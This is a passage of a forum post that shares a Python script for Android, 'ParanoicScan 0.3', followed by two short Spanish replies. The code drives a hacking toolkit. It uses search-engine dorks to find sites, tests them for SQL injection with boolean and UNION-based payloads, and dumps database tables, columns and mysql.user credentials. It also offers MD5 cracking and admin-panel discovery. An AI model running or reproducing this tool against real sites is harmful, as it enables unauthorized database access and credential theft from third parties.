      aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
      ref = aplicacion.dialogGetResponse().result

      if not ref['which'] == 'positive' :
       menusql()
      else:
       tabla = ref['value']
       aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
       aplicacion.dialogShow()

       don = showcolumnsdb(webvul,db,tabla)
     
       aplicacion.dialogDismiss()

       aplicacion.dialogCreateAlert("SQLI Scanner",don)
       aplicacion.dialogSetPositiveButtonText("Done")
       aplicacion.dialogShow()
     
       op = aplicacion.dialogGetResponse().result

       if op["which"] == "positive" :
        menusql()

    if opsql==5 :

     aplicacion.dialogCreateAlert("SQLI Scanner")
     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
     aplicacion.dialogShow()

     don = mysqluser(webvul)

     aplicacion.dialogDismiss()

     aplicacion.dialogCreateAlert("SQLI Scanner",don)
     aplicacion.dialogSetPositiveButtonText("Done")
     aplicacion.dialogShow()
     
     op = aplicacion.dialogGetResponse().result

     if op["which"] == "positive" :
      menusql()
     
    if opsql==6 :

     aplicacion.dialogCreateAlert("SQLI Scanner")
     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
     aplicacion.dialogShow()

     don = more(webvul)

     aplicacion.dialogDismiss()

     aplicacion.dialogCreateAlert("SQLI Scanner",don)
     aplicacion.dialogSetPositiveButtonText("Done")
     aplicacion.dialogShow()
     
     op = aplicacion.dialogGetResponse().result

     if op["which"] == "positive" :
      menusql()

    if opsql==7 :

     aplicacion.dialogCreateAlert("SQLI Scanner")
     
     aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menusql()
     else:  
      tabla = ref['value']

      aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
      ref = aplicacion.dialogGetResponse().result

      if not ref['which'] == 'positive' :
       menusql()
      else:
       columna1 = ref['value']
       aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
       ref = aplicacion.dialogGetResponse().result
       if not ref['which'] == 'positive' :
        menusql()
       else:  
        columna2 = ref['value']
        aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
        aplicacion.dialogShow()

        don = dumper(webvul,tabla,columna1,columna2)
     
        aplicacion.dialogDismiss()
        aplicacion.dialogCreateAlert("SQLI Scanner",don)
        aplicacion.dialogSetPositiveButtonText("Done")
        aplicacion.dialogShow()  
        op = aplicacion.dialogGetResponse().result

        if op["which"] == "positive" :
         menusql()

    if opsql==8:
     menu()

    def menu():

    aplicacion.dialogCreateAlert("ParanoicScan 0.3 (C) Doddy Hackman 2014")
    aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
    aplicacion.dialogShow()
    re = aplicacion.dialogGetResponse().result
    re2 = re["item"]

    if re2==0:

     aplicacion.dialogCreateAlert("BingHack Tool")
     
     aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menu()
     else:  
      dork = ref['value']

      aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
      ref = aplicacion.dialogGetResponse().result

      if not ref['which'] == 'positive' :
       menu()
      else:
       paginas = ref['value']

       paginas = str(paginas)

       aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
       aplicacion.dialogShow()

       founds = ""
       rez = ""
       rtafinal = ""

       founds = bingscan(dork,paginas)

       aplicacion.dialogDismiss()

       aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
       aplicacion.dialogShow()

       rez = sqltest(founds)

       if len(rez) == 0 :
        rtafinal = "[-] Not Found"
       else :
        rtafinal = "[++] Pages Founds\n\n"
        rtafinal = rtafinal + rez
        rtafinal = rtafinal + "\n[++] Finished\n"

       aplicacion.dialogDismiss()

       aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
       aplicacion.dialogSetPositiveButtonText("Done")
       aplicacion.dialogShow()
     
       op = aplicacion.dialogGetResponse().result
       if op["which"] == "positive" :
        menu()

    if re2==1 :

     global webvul

     aplicacion.dialogCreateAlert("SQLI Scanner")
     
     aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menu()
     else:  
      web = ref['value']
      aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
      aplicacion.dialogShow()

      pass1,pass2 = bypass("--")
      code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
      codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)

      if not code==codedos:
       aplicacion.dialogDismiss()
       aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
       aplicacion.dialogSetPositiveButtonText("Done")
       aplicacion.dialogShow()
       op = aplicacion.dialogGetResponse().result
       if op["which"] == "positive" :

        pass1,pass2 = bypass("--")
        rtacondata = ""
        control_sql = 0

        aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
        aplicacion.dialogShow()

        number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
        for te in range(2,30):
         number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
         code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
         if(regexver(code)):
          numbers = regexdar(code)

          control_sql = 1

          rtacondata = rtacondata + "[+] Column length : "+str(te)
          rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"

          sql = ""
          tex = te + 1
          for sqlix in range(2,tex):
           sql = str(sql)+","+str(sqlix)
           sqli  = str(1)+sql
          sqla = reem(sqli,numbers[0])
          aplicacion.dialogDismiss()
          aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
          aplicacion.dialogSetPositiveButtonText("Done")
          aplicacion.dialogShow()
          op = aplicacion.dialogGetResponse().result
          if op["which"] == "positive" :
       webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
       menusql()

        if control_sql==0:

         aplicacion.dialogDismiss()
         aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
         aplicacion.dialogSetPositiveButtonText("Done")
         aplicacion.dialogShow()
         op = aplicacion.dialogGetResponse().result
         if op["which"] == "positive" :
          aplicacion.exit()

      else:
       aplicacion.dialogDismiss()
       aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
       aplicacion.dialogSetPositiveButtonText("Done")
       aplicacion.dialogShow()
       op = aplicacion.dialogGetResponse().result
       if op["which"] == "positive" :
        aplicacion.exit()

    if re2==2 :

     aplicacion.dialogCreateAlert("MD5 Cracker")
     
     aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menu()
     else:  
      target = ref['value']

      aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
      aplicacion.dialogShow()

      don = crackmd5(target)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("MD5 Cracker",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menu()
     
    if re2==3 :

     aplicacion.dialogCreateAlert("Admin Finder")
     
     aplicacion.dialogGetInput("Admin Finder","Enter Target")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menu()
     else:  
      target = ref['value']

      aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
      aplicacion.dialogShow()

      don = scanpanel(target)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("Admin Finder",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menu()

    if re2==4 :

     aplicacion.dialogCreateAlert("LocateIP")
     
     aplicacion.dialogGetInput("LocateIP","Enter Target")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menu()
     else:
      target = ref['value']

      aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
      aplicacion.dialogShow()

      don = locateip(target)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("LocateIP",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menu()
     
    if re2==5 :

     aplicacion.dialogCreateAlert("HTTP FingerPrinting")
     
     aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menu()
     else:
      target = ref['value']

      aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
      aplicacion.dialogShow()

      don = httpfinger(target)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menu()

    if re2==6 :
     menuencoder()

    if re2==7 :

      about = "This program was written by Doddy Hackman in the summer of 2014"
      aplicacion.dialogCreateAlert("About",about)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menu()

    if re2==8 :
     aplicacion.exit()
     
    menu()

    # The End ?


    Si quieren bajarlo lo pueden hacer de aca

adastra

Un script interesante
:)Muchas gracias por compartirlo con todos nosotros